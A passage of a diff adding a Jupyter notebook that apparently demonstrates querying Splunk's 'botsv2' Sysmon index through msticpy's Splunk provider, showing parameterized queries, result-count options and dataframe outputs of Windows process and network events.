+       "      <th>EventID</th>\n",
+       "      <th>EventDescription</th>\n",
+       "      <th>User</th>\n",
+       "      <th>process</th>\n",
+       "      <th>Image</th>\n",
+       "      <th>dest</th>\n",
+       "      <th>cmdline</th>\n",
+       "      <th>parent_process</th>\n",
+       "      <th>ParentCommandLine</th>\n",
+       "      <th>Hashes</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>2017-08-25T04:57:45.512440700Z</td>\n",
+       "      <td>venus</td>\n",
+       "      <td>3</td>\n",
+       "      <td>Network Connect</td>\n",
+       "      <td>NT AUTHORITY\\SYSTEM</td>\n",
+       "      <td>powershell.exe</td>\n",
+       "      <td>C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\pow...</td>\n",
+       "      <td>45.77.65.211.vultr.com</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>2017-08-25T04:57:45.213738500Z</td>\n",
+       "      <td>wrk-aturing</td>\n",
+       "      <td>5</td>\n",
+       "      <td>Process Terminate</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>conhost.exe</td>\n",
+       "      <td>C:\\Windows\\System32\\conhost.exe</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>2017-08-25T04:57:45.213738500Z</td>\n",
+       "      <td>wrk-aturing</td>\n",
+       "      <td>5</td>\n",
+       "      <td>Process Terminate</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>cscript.exe</td>\n",
+       "      <td>C:\\Windows\\System32\\cscript.exe</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>3</th>\n",
+       "      <td>2017-08-25T04:57:45.088941700Z</td>\n",
+       "      <td>wrk-aturing</td>\n",
+       "      <td>1</td>\n",
+       "      <td>Process Create</td>\n",
+       "      <td>NT AUTHORITY\\SYSTEM</td>\n",
+       "      <td>conhost.exe</td>\n",
+       "      <td>C:\\Windows\\System32\\conhost.exe</td>\n",
+       "      <td>wrk-aturing.frothly.local</td>\n",
+       "      <td>\\??\\C:\\Windows\\system32\\conhost.exe</td>\n",
+       "      <td>C:\\Windows\\System32\\csrss.exe</td>\n",
+       "      <td>%SystemRoot%\\system32\\csrss.exe ObjectDirector...</td>\n",
+       "      <td>SHA1=680DEC0F8907F4B8911FBE2AA5F2FD25425BE0B0</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>4</th>\n",
+       "      <td>2017-08-25T04:57:45.088941700Z</td>\n",
+       "      <td>wrk-aturing</td>\n",
+       "      <td>1</td>\n",
+       "      <td>Process Create</td>\n",
+       "      <td>NT AUTHORITY\\SYSTEM</td>\n",
+       "      <td>cscript.exe</td>\n",
+       "      <td>C:\\Windows\\System32\\cscript.exe</td>\n",
+       "      <td>wrk-aturing.frothly.local</td>\n",
+       "      <td>C:\\Windows\\system32\\cscript.exe  //Job:AgentHI...</td>\n",
+       "      <td>C:\\Program Files (x86)\\Symantec\\Symantec Endpo...</td>\n",
+       "      <td>\"C:\\Program Files (x86)\\Symantec\\Symantec Endp...</td>\n",
+       "      <td>SHA1=70096A77E202CF9F30C064956F36D14BCBD8F7BB</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>...</th>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>95</th>\n",
+       "      <td>2017-08-25T04:57:02.003800000Z</td>\n",
+       "      <td>wrk-ghoppy</td>\n",
+       "      <td>1</td>\n",
+       "      <td>Process Create</td>\n",
+       "      <td>NT AUTHORITY\\SYSTEM</td>\n",
+       "      <td>splunk-powershell.exe</td>\n",
+       "      <td>C:\\Program Files\\SplunkUniversalForwarder\\bin\\...</td>\n",
+       "      <td>wrk-ghoppy.frothly.local</td>\n",
+       "      <td>\"C:\\Program Files\\SplunkUniversalForwarder\\bin...</td>\n",
+       "      <td>C:\\Program Files\\SplunkUniversalForwarder\\bin\\...</td>\n",
+       "      <td>\"C:\\Program Files\\SplunkUniversalForwarder\\bin...</td>\n",
+       "      <td>SHA1=50A428905F5BA8808464F8A8183DD3662D8157F6</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>96</th>\n",
+       "      <td>2017-08-25T04:57:01.170335100Z</td>\n",
+       "      <td>venus</td>\n",
+       "      <td>3</td>\n",
+       "      <td>Network Connect</td>\n",
+       "      <td>NT AUTHORITY\\SYSTEM</td>\n",
+       "      <td>powershell.exe</td>\n",
+       "      <td>C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\pow...</td>\n",
+       "      <td>45.77.65.211.vultr.com</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>97</th>\n",
+       "      <td>2017-08-25T04:57:01.941402000Z</td>\n",
+       "      <td>wrk-ghoppy</td>\n",
+       "      <td>5</td>\n",
+       "      <td>Process Terminate</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>splunk-winprintmon.exe</td>\n",
+       "      <td>C:\\Program Files\\SplunkUniversalForwarder\\bin\\...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>98</th>\n",
+       "      <td>2017-08-25T04:57:01.863404500Z</td>\n",
+       "      <td>wrk-ghoppy</td>\n",
+       "      <td>1</td>\n",
+       "      <td>Process Create</td>\n",
+       "      <td>NT AUTHORITY\\SYSTEM</td>\n",
+       "      <td>splunk-netmon.exe</td>\n",
+       "      <td>C:\\Program Files\\SplunkUniversalForwarder\\bin\\...</td>\n",
+       "      <td>wrk-ghoppy.frothly.local</td>\n",
+       "      <td>\"C:\\Program Files\\SplunkUniversalForwarder\\bin...</td>\n",
+       "      <td>C:\\Program Files\\SplunkUniversalForwarder\\bin\\...</td>\n",
+       "      <td>\"C:\\Program Files\\SplunkUniversalForwarder\\bin...</td>\n",
+       "      <td>SHA1=0644F98A9874414C738A0B8841BB997FB9BFC274</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>99</th>\n",
+       "      <td>2017-08-25T04:57:01.754208000Z</td>\n",
+       "      <td>wrk-ghoppy</td>\n",
+       "      <td>5</td>\n",
+       "      <td>Process Terminate</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>splunk-powershell.exe</td>\n",
+       "      <td>C:\\Program Files\\SplunkUniversalForwarder\\bin\\...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "<p>100 rows × 12 columns</p>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "                       TimeCreated         host EventID   EventDescription  \\\n",
+       "0   2017-08-25T04:57:45.512440700Z        venus       3    Network Connect   \n",
+       "1   2017-08-25T04:57:45.213738500Z  wrk-aturing       5  Process Terminate   \n",
+       "2   2017-08-25T04:57:45.213738500Z  wrk-aturing       5  Process Terminate   \n",
+       "3   2017-08-25T04:57:45.088941700Z  wrk-aturing       1     Process Create   \n",
+       "4   2017-08-25T04:57:45.088941700Z  wrk-aturing       1     Process Create   \n",
+       "..                             ...          ...     ...                ...   \n",
+       "95  2017-08-25T04:57:02.003800000Z   wrk-ghoppy       1     Process Create   \n",
+       "96  2017-08-25T04:57:01.170335100Z        venus       3    Network Connect   \n",
+       "97  2017-08-25T04:57:01.941402000Z   wrk-ghoppy       5  Process Terminate   \n",
+       "98  2017-08-25T04:57:01.863404500Z   wrk-ghoppy       1     Process Create   \n",
+       "99  2017-08-25T04:57:01.754208000Z   wrk-ghoppy       5  Process Terminate   \n",
+       "\n",
+       "                   User                 process  \\\n",
+       "0   NT AUTHORITY\\SYSTEM          powershell.exe   \n",
+       "1                   NaN             conhost.exe   \n",
+       "2                   NaN             cscript.exe   \n",
+       "3   NT AUTHORITY\\SYSTEM             conhost.exe   \n",
+       "4   NT AUTHORITY\\SYSTEM             cscript.exe   \n",
+       "..                  ...                     ...   \n",
+       "95  NT AUTHORITY\\SYSTEM   splunk-powershell.exe   \n",
+       "96  NT AUTHORITY\\SYSTEM          powershell.exe   \n",
+       "97                  NaN  splunk-winprintmon.exe   \n",
+       "98  NT AUTHORITY\\SYSTEM       splunk-netmon.exe   \n",
+       "99                  NaN   splunk-powershell.exe   \n",
+       "\n",
+       "                                                Image  \\\n",
+       "0   C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\pow...   \n",
+       "1                     C:\\Windows\\System32\\conhost.exe   \n",
+       "2                     C:\\Windows\\System32\\cscript.exe   \n",
+       "3                     C:\\Windows\\System32\\conhost.exe   \n",
+       "4                     C:\\Windows\\System32\\cscript.exe   \n",
+       "..                                                ...   \n",
+       "95  C:\\Program Files\\SplunkUniversalForwarder\\bin\\...   \n",
+       "96  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\pow...   \n",
+       "97  C:\\Program Files\\SplunkUniversalForwarder\\bin\\...   \n",
+       "98  C:\\Program Files\\SplunkUniversalForwarder\\bin\\...   \n",
+       "99  C:\\Program Files\\SplunkUniversalForwarder\\bin\\...   \n",
+       "\n",
+       "                         dest  \\\n",
+       "0      45.77.65.211.vultr.com   \n",
+       "1                         NaN   \n",
+       "2                         NaN   \n",
+       "3   wrk-aturing.frothly.local   \n",
+       "4   wrk-aturing.frothly.local   \n",
+       "..                        ...   \n",
+       "95   wrk-ghoppy.frothly.local   \n",
+       "96     45.77.65.211.vultr.com   \n",
+       "97                        NaN   \n",
+       "98   wrk-ghoppy.frothly.local   \n",
+       "99                        NaN   \n",
+       "\n",
+       "                                              cmdline  \\\n",
+       "0                                                 NaN   \n",
+       "1                                                 NaN   \n",
+       "2                                                 NaN   \n",
+       "3                 \\??\\C:\\Windows\\system32\\conhost.exe   \n",
+       "4   C:\\Windows\\system32\\cscript.exe  //Job:AgentHI...   \n",
+       "..                                                ...   \n",
+       "95  \"C:\\Program Files\\SplunkUniversalForwarder\\bin...   \n",
+       "96                                                NaN   \n",
+       "97                                                NaN   \n",
+       "98  \"C:\\Program Files\\SplunkUniversalForwarder\\bin...   \n",
+       "99                                                NaN   \n",
+       "\n",
+       "                                       parent_process  \\\n",
+       "0                                                 NaN   \n",
+       "1                                                 NaN   \n",
+       "2                                                 NaN   \n",
+       "3                       C:\\Windows\\System32\\csrss.exe   \n",
+       "4   C:\\Program Files (x86)\\Symantec\\Symantec Endpo...   \n",
+       "..                                                ...   \n",
+       "95  C:\\Program Files\\SplunkUniversalForwarder\\bin\\...   \n",
+       "96                                                NaN   \n",
+       "97                                                NaN   \n",
+       "98  C:\\Program Files\\SplunkUniversalForwarder\\bin\\...   \n",
+       "99                                                NaN   \n",
+       "\n",
+       "                                    ParentCommandLine  \\\n",
+       "0                                                 NaN   \n",
+       "1                                                 NaN   \n",
+       "2                                                 NaN   \n",
+       "3   %SystemRoot%\\system32\\csrss.exe ObjectDirector...   \n",
+       "4   \"C:\\Program Files (x86)\\Symantec\\Symantec Endp...   \n",
+       "..                                                ...   \n",
+       "95  \"C:\\Program Files\\SplunkUniversalForwarder\\bin...   \n",
+       "96                                                NaN   \n",
+       "97                                                NaN   \n",
+       "98  \"C:\\Program Files\\SplunkUniversalForwarder\\bin...   \n",
+       "99                                                NaN   \n",
+       "\n",
+       "                                           Hashes  \n",
+       "0                                             NaN  \n",
+       "1                                             NaN  \n",
+       "2                                             NaN  \n",
+       "3   SHA1=680DEC0F8907F4B8911FBE2AA5F2FD25425BE0B0  \n",
+       "4   SHA1=70096A77E202CF9F30C064956F36D14BCBD8F7BB  \n",
+       "..                                            ...  \n",
+       "95  SHA1=50A428905F5BA8808464F8A8183DD3662D8157F6  \n",
+       "96                                            NaN  \n",
+       "97                                            NaN  \n",
+       "98  SHA1=0644F98A9874414C738A0B8841BB997FB9BFC274  \n",
+       "99                                            NaN  \n",
+       "\n",
+       "[100 rows x 12 columns]"
+      ]
+     },
+     "execution_count": 8,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "splunk_prov.SplunkGeneral.get_events_parameterized(\n",
+    "    index=\"botsv2\",\n",
+    "    source=\"WinEventLog:Microsoft-Windows-Sysmon/Operational\",\n",
+    "    start=\"2017-08-25 00:00:00.000000\",\n",
+    "    end=\"2017-08-25 10:00:00.000000\"\n",
+    ")"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "By-default, splunk query results are limited to 100. you can specify `count=0` argument to return all the results. \n",
+    "Deafult value for `add_query_items` argument is set to `| head 100` which you can reset as shown in below example while retrieving all results. "
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 9,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-08-07T19:16:25.861893Z",
+     "start_time": "2020-08-07T19:15:55.084994Z"
+    }
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>TimeCreated</th>\n",
+       "      <th>host</th>\n",
+       "      <th>EventID</th>\n",
+       "      <th>EventDescription</th>\n",
+       "      <th>User</th>\n",
+       "      <th>process</th>\n",
+       "      <th>Image</th>\n",
+       "      <th>dest</th>\n",
+       "      <th>cmdline</th>\n",
+       "      <th>parent_process</th>\n",
+       "      <th>ParentCommandLine</th>\n",
+       "      <th>Hashes</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>2017-08-25T04:57:45.512440700Z</td>\n",
+       "      <td>venus</td>\n",
+       "      <td>3</td>\n",
+       "      <td>Network Connect</td>\n",
+       "      <td>NT AUTHORITY\\SYSTEM</td>\n",
+       "      <td>powershell.exe</td>\n",
+       "      <td>C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\pow...</td>\n",
+       "      <td>45.77.65.211.vultr.com</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>2017-08-25T04:57:45.213738500Z</td>\n",
+       "      <td>wrk-aturing</td>\n",
+       "      <td>5</td>\n",
+       "      <td>Process Terminate</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>conhost.exe</td>\n",
+       "      <td>C:\\Windows\\System32\\conhost.exe</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>2017-08-25T04:57:45.213738500Z</td>\n",
+       "      <td>wrk-aturing</td>\n",
+       "      <td>5</td>\n",
+       "      <td>Process Terminate</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>cscript.exe</td>\n",
+       "      <td>C:\\Windows\\System32\\cscript.exe</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>3</th>\n",
+       "      <td>2017-08-25T04:57:45.088941700Z</td>\n",
+       "      <td>wrk-aturing</td>\n",
+       "      <td>1</td>\n",
+       "      <td>Process Create</td>\n",
+       "      <td>NT AUTHORITY\\SYSTEM</td>\n",
+       "      <td>conhost.exe</td>\n",
+       "      <td>C:\\Windows\\System32\\conhost.exe</td>\n",
+       "      <td>wrk-aturing.frothly.local</td>\n",
+       "      <td>\\??\\C:\\Windows\\system32\\conhost.exe</td>\n",
+       "      <td>C:\\Windows\\System32\\csrss.exe</td>\n",
+       "      <td>%SystemRoot%\\system32\\csrss.exe ObjectDirector...</td>\n",
+       "      <td>SHA1=680DEC0F8907F4B8911FBE2AA5F2FD25425BE0B0</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>4</th>\n",
+       "      <td>2017-08-25T04:57:45.088941700Z</td>\n",
+       "      <td>wrk-aturing</td>\n",
+       "      <td>1</td>\n",
+       "      <td>Process Create</td>\n",
+       "      <td>NT AUTHORITY\\SYSTEM</td>\n",
+       "      <td>cscript.exe</td>\n",
+       "      <td>C:\\Windows\\System32\\cscript.exe</td>\n",
+       "      <td>wrk-aturing.frothly.local</td>\n",
+       "      <td>C:\\Windows\\system32\\cscript.exe  //Job:AgentHI...</td>\n",
+       "      <td>C:\\Program Files (x86)\\Symantec\\Symantec Endpo...</td>\n",
+       "      <td>\"C:\\Program Files (x86)\\Symantec\\Symantec Endp...</td>\n",
+       "      <td>SHA1=70096A77E202CF9F30C064956F36D14BCBD8F7BB</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>...</th>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>7923</th>\n",
+       "      <td>2017-08-25T04:57:46.758125600Z</td>\n",
+       "      <td>wrk-klagerf</td>\n",
+       "      <td>1</td>\n",
+       "      <td>Process Create</td>\n",
+       "      <td>NT AUTHORITY\\SYSTEM</td>\n",
+       "      <td>splunk-admon.exe</td>\n",
+       "      <td>C:\\Program Files\\SplunkUniversalForwarder\\bin\\...</td>\n",
+       "      <td>wrk-klagerf.frothly.local</td>\n",
+       "      <td>\"C:\\Program Files\\SplunkUniversalForwarder\\bin...</td>\n",
+       "      <td>C:\\Program Files\\SplunkUniversalForwarder\\bin\\...</td>\n",
+       "      <td>\"C:\\Program Files\\SplunkUniversalForwarder\\bin...</td>\n",
+       "      <td>SHA1=1C0C7368C8B7B688CCF77D1062708E60D581B0AF</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>7924</th>\n",
+       "      <td>2017-08-25T04:57:46.695728800Z</td>\n",
+       "      <td>wrk-klagerf</td>\n",
+       "      <td>5</td>\n",
+       "      <td>Process Terminate</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>splunk-MonitorNoHandle.exe</td>\n",
+       "      <td>C:\\Program Files\\SplunkUniversalForwarder\\bin\\...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>7925</th>\n",
+       "      <td>2017-08-25T04:57:46.570935200Z</td>\n",
+       "      <td>wrk-klagerf</td>\n",
+       "      <td>1</td>\n",
+       "      <td>Process Create</td>\n",
+       "      <td>NT AUTHORITY\\SYSTEM</td>\n",
+       "      <td>splunk-MonitorNoHandle.exe</td>\n",
+       "      <td>C:\\Program Files\\SplunkUniversalForwarder\\bin\\...</td>\n",
+       "      <td>wrk-klagerf.frothly.local</td>\n",
+       "      <td>\"C:\\Program Files\\SplunkUniversalForwarder\\bin...</td>\n",
+       "      <td>C:\\Program Files\\SplunkUniversalForwarder\\bin\\...</td>\n",
+       "      <td>\"C:\\Program Files\\SplunkUniversalForwarder\\bin...</td>\n",
+       "      <td>SHA1=F48EDD0FE4D013D690196572EA96A4FA6EB04E77</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>7926</th>\n",
+       "      <td>2017-08-25T04:57:46.539736800Z</td>\n",
+       "      <td>wrk-klagerf</td>\n",
+       "      <td>5</td>\n",
+       "      <td>Process Terminate</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>splunk-powershell.exe</td>\n",
+       "      <td>C:\\Program Files\\SplunkUniversalForwarder\\bin\\...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>7927</th>\n",
+       "      <td>2017-08-25T04:57:46.430542400Z</td>\n",
+       "      <td>wrk-klagerf</td>\n",
+       "      <td>1</td>\n",
+       "      <td>Process Create</td>\n",
+       "      <td>NT AUTHORITY\\SYSTEM</td>\n",
+       "      <td>splunk-powershell.exe</td>\n",
+       "      <td>C:\\Program Files\\SplunkUniversalForwarder\\bin\\...</td>\n",
+       "      <td>wrk-klagerf.frothly.local</td>\n",
+       "      <td>\"C:\\Program Files\\SplunkUniversalForwarder\\bin...</td>\n",
+       "      <td>C:\\Program Files\\SplunkUniversalForwarder\\bin\\...</td>\n",
+       "      <td>\"C:\\Program Files\\SplunkUniversalForwarder\\bin...</td>\n",
+       "      <td>SHA1=50A428905F5BA8808464F8A8183DD3662D8157F6</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "<p>7928 rows × 12 columns</p>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "                         TimeCreated         host EventID   EventDescription  \\\n",
+       "0     2017-08-25T04:57:45.512440700Z        venus       3    Network Connect   \n",
+       "1     2017-08-25T04:57:45.213738500Z  wrk-aturing       5  Process Terminate   \n",
+       "2     2017-08-25T04:57:45.213738500Z  wrk-aturing       5  Process Terminate   \n",
+       "3     2017-08-25T04:57:45.088941700Z  wrk-aturing       1     Process Create   \n",
+       "4     2017-08-25T04:57:45.088941700Z  wrk-aturing       1     Process Create   \n",
+       "...                              ...          ...     ...                ...   \n",
+       "7923  2017-08-25T04:57:46.758125600Z  wrk-klagerf       1     Process Create   \n",
+       "7924  2017-08-25T04:57:46.695728800Z  wrk-klagerf       5  Process Terminate   \n",
+       "7925  2017-08-25T04:57:46.570935200Z  wrk-klagerf       1     Process Create   \n",
+       "7926  2017-08-25T04:57:46.539736800Z  wrk-klagerf       5  Process Terminate   \n",
+       "7927  2017-08-25T04:57:46.430542400Z  wrk-klagerf       1     Process Create   \n",
+       "\n",
+       "                     User                     process  \\\n",
+       "0     NT AUTHORITY\\SYSTEM              powershell.exe   \n",
+       "1                     NaN                 conhost.exe   \n",
+       "2                     NaN                 cscript.exe   \n",
+       "3     NT AUTHORITY\\SYSTEM                 conhost.exe   \n",
+       "4     NT AUTHORITY\\SYSTEM                 cscript.exe   \n",
+       "...                   ...                         ...   \n",
+       "7923  NT AUTHORITY\\SYSTEM            splunk-admon.exe   \n",
+       "7924                  NaN  splunk-MonitorNoHandle.exe   \n",
+       "7925  NT AUTHORITY\\SYSTEM  splunk-MonitorNoHandle.exe   \n",
+       "7926                  NaN       splunk-powershell.exe   \n",
+       "7927  NT AUTHORITY\\SYSTEM       splunk-powershell.exe   \n",
+       "\n",
+       "                                                  Image  \\\n",
+       "0     C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\pow...   \n",
+       "1                       C:\\Windows\\System32\\conhost.exe   \n",
+       "2                       C:\\Windows\\System32\\cscript.exe   \n",
+       "3                       C:\\Windows\\System32\\conhost.exe   \n",
+       "4                       C:\\Windows\\System32\\cscript.exe   \n",
+       "...                                                 ...   \n",
+       "7923  C:\\Program Files\\SplunkUniversalForwarder\\bin\\...   \n",
+       "7924  C:\\Program Files\\SplunkUniversalForwarder\\bin\\...   \n",
+       "7925  C:\\Program Files\\SplunkUniversalForwarder\\bin\\...   \n",
+       "7926  C:\\Program Files\\SplunkUniversalForwarder\\bin\\...   \n",
+       "7927  C:\\Program Files\\SplunkUniversalForwarder\\bin\\...   \n",
+       "\n",
+       "                           dest  \\\n",
+       "0        45.77.65.211.vultr.com   \n",
+       "1                           NaN   \n",
+       "2                           NaN   \n",
+       "3     wrk-aturing.frothly.local   \n",
+       "4     wrk-aturing.frothly.local   \n",
+       "...                         ...   \n",
+       "7923  wrk-klagerf.frothly.local   \n",
+       "7924                        NaN   \n",
+       "7925  wrk-klagerf.frothly.local   \n",
+       "7926                        NaN   \n",
+       "7927  wrk-klagerf.frothly.local   \n",
+       "\n",
+       "                                                cmdline  \\\n",
+       "0                                                   NaN   \n",
+       "1                                                   NaN   \n",
+       "2                                                   NaN   \n",
+       "3                   \\??\\C:\\Windows\\system32\\conhost.exe   \n",
+       "4     C:\\Windows\\system32\\cscript.exe  //Job:AgentHI...   \n",
+       "...                                                 ...   \n",
+       "7923  \"C:\\Program Files\\SplunkUniversalForwarder\\bin...   \n",
+       "7924                                                NaN   \n",
+       "7925  \"C:\\Program Files\\SplunkUniversalForwarder\\bin...   \n",
+       "7926                                                NaN   \n",
+       "7927  \"C:\\Program Files\\SplunkUniversalForwarder\\bin...   \n",
+       "\n",
+       "                                         parent_process  \\\n",
+       "0                                                   NaN   \n",
+       "1                                                   NaN   \n",
+       "2                                                   NaN   \n",
+       "3                         C:\\Windows\\System32\\csrss.exe   \n",
+       "4     C:\\Program Files (x86)\\Symantec\\Symantec Endpo...   \n",
+       "...                                                 ...   \n",
+       "7923  C:\\Program Files\\SplunkUniversalForwarder\\bin\\...   \n",
+       "7924                                                NaN   \n",
+       "7925  C:\\Program Files\\SplunkUniversalForwarder\\bin\\...   \n",
+       "7926                                                NaN   \n",
+       "7927  C:\\Program Files\\SplunkUniversalForwarder\\bin\\...   \n",
+       "\n",
+       "                                      ParentCommandLine  \\\n",
+       "0                                                   NaN   \n",
+       "1                                                   NaN   \n",
+       "2                                                   NaN   \n",
+       "3     %SystemRoot%\\system32\\csrss.exe ObjectDirector...   \n",
+       "4     \"C:\\Program Files (x86)\\Symantec\\Symantec Endp...   \n",
+       "...                                                 ...   \n",
+       "7923  \"C:\\Program Files\\SplunkUniversalForwarder\\bin...   \n",
+       "7924                                                NaN   \n",
+       "7925  \"C:\\Program Files\\SplunkUniversalForwarder\\bin...   \n",
+       "7926                                                NaN   \n",
+       "7927  \"C:\\Program Files\\SplunkUniversalForwarder\\bin...   \n",
+       "\n",
+       "                                             Hashes  \n",
+       "0                                               NaN  \n",
+       "1                                               NaN  \n",
+       "2                                               NaN  \n",
+       "3     SHA1=680DEC0F8907F4B8911FBE2AA5F2FD25425BE0B0  \n",
+       "4     SHA1=70096A77E202CF9F30C064956F36D14BCBD8F7BB  \n",
+       "...                                             ...  \n",
+       "7923  SHA1=1C0C7368C8B7B688CCF77D1062708E60D581B0AF  \n",
+       "7924                                            NaN  \n",
+       "7925  SHA1=F48EDD0FE4D013D690196572EA96A4FA6EB04E77  \n",
+       "7926                                            NaN  \n",
+       "7927  SHA1=50A428905F5BA8808464F8A8183DD3662D8157F6  \n",
+       "\n",
+       "[7928 rows x 12 columns]"
+      ]
+     },
+     "execution_count": 9,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "splunk_prov.SplunkGeneral.get_events_parameterized(\n",
+    "    index=\"botsv2\",\n",
+    "    source=\"WinEventLog:Microsoft-Windows-Sysmon/Operational\",\n",
+    "    start=\"2017-08-25 00:00:00.000000\",\n",
+    "    end=\"2017-08-25 10:00:00.000000\",\n",
+    "    add_query_items='',\n",
+    "    count=0\n",
+    ")"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Running a Ad-hoc Splunk query\n",
+    "You can also define a your own splunk query and run it via splunk provider via `QUERY_PROVIDER.exec_query(<queryname>)`\n",
+    "\n",
+    "For more information, check documentation [Running and Ad-hoc Query](https://msticpy.readthedocs.io/en/latest/data_acquisition/DataProviders.html#running-an-ad-hoc-query)"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 10,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-08-07T19:16:35.628634Z",
+     "start_time": "2020-08-07T19:16:35.294749Z"
+    }
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
